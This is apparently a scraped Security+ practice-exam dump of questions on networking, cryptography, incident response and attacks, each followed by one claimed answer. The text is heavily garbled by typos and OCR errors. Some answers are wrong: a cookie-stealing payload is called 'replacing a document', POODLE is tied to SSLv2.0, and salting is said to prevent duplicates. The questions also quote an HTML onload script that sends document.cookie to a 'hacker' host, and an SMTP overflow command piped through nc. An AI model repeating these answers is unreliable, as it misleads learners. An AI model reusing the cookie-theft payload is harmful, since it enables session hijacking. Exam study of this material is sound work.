B
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup-querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX prefer ence=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address= 192.168.102.67 Which of the following should the penetration tester conclude about the command output?
192.168.102.67 is a backup mail server that may be more vulnerable to attack.
A security analyst is attempting to break into a client's secure network . The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform :
A gray-box penetration test.
To determine the ALE of a particular risk, which of the following must be caculated?
ARO SLE
A penetration tester harvests Potential usernames From a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?
Active reconnaissance
A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?
Air gap the desktops.
A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins zChanges Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?
An FACL has been added to the permissions for the file.
Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator?
An attacker could potentially perform a downgrade attack. The IPSec payload reverted to a 16-bit sequence numbers.
Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?
Antivirus
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating : Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST?
Apply organizational context to the risk rating.
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?
Arp- s 192.168.1.1 00- 3a-d1-fa-b1-06
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
Behavior-based IPS with a communication link to a cloud-based vulnerability and threatfeed
During a routine vulnerability assessmen,t the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' '" I nc www.company.com 25 Which of the following vulnerabilities is being exploited?
Buffer overflow directed at a specific hostMTA
An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?
CASB
The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is recieve reports that users are experiencing the following error when attemping to log in to their previous system: Logon Failure: Access Denied Which of the following can cause the issue?
Certificate Issues
A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to user interactive shell login. Which of the following configuration parameters shojld be implemented?
ChrootDirectory PermitTTY
An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software?
Configure a firewall with deep packet inspection that restricts traffic to the systems.
Which of the following controls allows a security guard to perform a post-incident review?
Corrective
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of the scan being performed?
Credentialed
A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem?
Decuplication
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration?
Deploying certificates to endpoint devices
Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?
Embedded web server
A security analyst has received the following alert snippet from the HIDS appliance: Pl=IU TO-C-OL STG SRC7='0RT O'ST.PO T TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192 .168.1.2:9001 TCP XMAS SCAN 192.168 .1.1:2264 192.168 .1.2:6455 TCP XMAS CAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack?
FIN, URG, and PSH flags are set in the packet header.
After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following wquld BEST assist the analyst in making this determination?
Fuzzer
A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the commpany most liekely select?
IaaS
After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take?
Identification
Which of the following is commonly done as part of the vulnerability scan?
Identifying unpatched workstations
A company offers Saas, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?
Implement SAML so the company's services may accept assertions from the customers' authentication servers.
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-levelexecutives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).
Implement an email OLP. Implement a spam filter.
A security ana!yst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability te require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements?
Implementing MDM software
After a security incidnet, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process?
Lessons learned
Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed?
Lessons learned review
Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack?
Lessonslearned
An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST?
Make a copy of everything in memory on the workstation.
Which of the following could help detect trespassers in a secure facility?
Motion-detection sensors Security guards
Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks?
OCSP stapling
After a recent internal breach, a company decided to regenerate a.nd reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?
One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.
an organization wants to utilize a commonInternet-based third-party provider for authorization and authentication. The provider Uses a technology based OAuth 2.0 toProvide required services. To which of the following technology is the provider referring?
OpenID connect
An in-house penetration tester has been asked to evade a new OLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act?
Outgoing emails containing unusually large image files
Ann is the IS manager for several new systems in which the classification of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?
Owner
Which of the following are used to increase the computing time it takes to brute force a password using an offline attack?
PBKDF2 bcrypt
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?
Passive Scan
A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)
Password complexity Location-based authentication
A hacker has a packet capture that contains: ....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture?
Password cracker
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to another host?
Pivoting
A systems administrator wants to generate a self-signedcertificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server?
Provide the private key to the internal CA.
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?
Proximity card, fingerprint scanner, PIN
Ann, security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements?
Public key Private Key
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
RAT
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?
Remote exploit
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?
Require applications to be digitally signed.
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?
Resiliency
A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?
Restrict contact information storage dataflow so it is only shared with the customer application.
A web developers improves clients access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements?
SAML
A manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)
SSH FTPS HTTPS
The POODLE attack is a MITM exploit that affects:
SSLv2.0 with CBC mode cipher.
An actor downloads and runs a programs program against a corporate login page. The program imports a list of username and password, looking for successful attempt. Which of the following terms best describes the actor in this situation?
Script kiddie
Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?
Service Level Agreement
Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?
Smart card
A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct Fl AST?
Survey threat feeds from services inside the same industry.
A security analyst us updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded?
The MTTR is faster. The RTO has decreased.
An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onl oad=document.location.replace ('http://hacker/post.asp?victim&message=" + document.cookie + "<br>" + "URL:" +"document.location) ; I> <lbodY> </HTML> Which of the following BEST explains what the attacker is doing?
The attacker is replacing a document.
A technician receives a device with the following anomalies : / F requent pop-up ads Show response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267E D2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29C CEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF2888 1F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe , E289F21CD33E4F57890DDEA5CF28E DC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed?
The web application firewall
Which of the following is the best reason for salting a password hash before it is stored in a database
To prevent duplicates value for being stored
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?
User account
A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed?
Using magnetic fields to erase the data
Which of the following describes the key difference between vishing and phishing attacks?
Vishing attacks are accomplished using telephony services.
A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees?
WPS
A oftware development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production . Which of the following development methodologies is the team MOST likely using now?
Waterfall
As part of the new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?
implement containerization of company data
A user needs to send senitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key?
non-repudiation Message integrity
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?
poor implementation
A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:
risk benefits analysis results to make a determination.
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch; C:\Window\SysWOW64|user32.dll WARNING - hash mismatch: C:\Window\SysWOW64|kernel32.dl Based solely on the above information. which of the foloowing types of malware is MOST likely installed on the system?
rootkit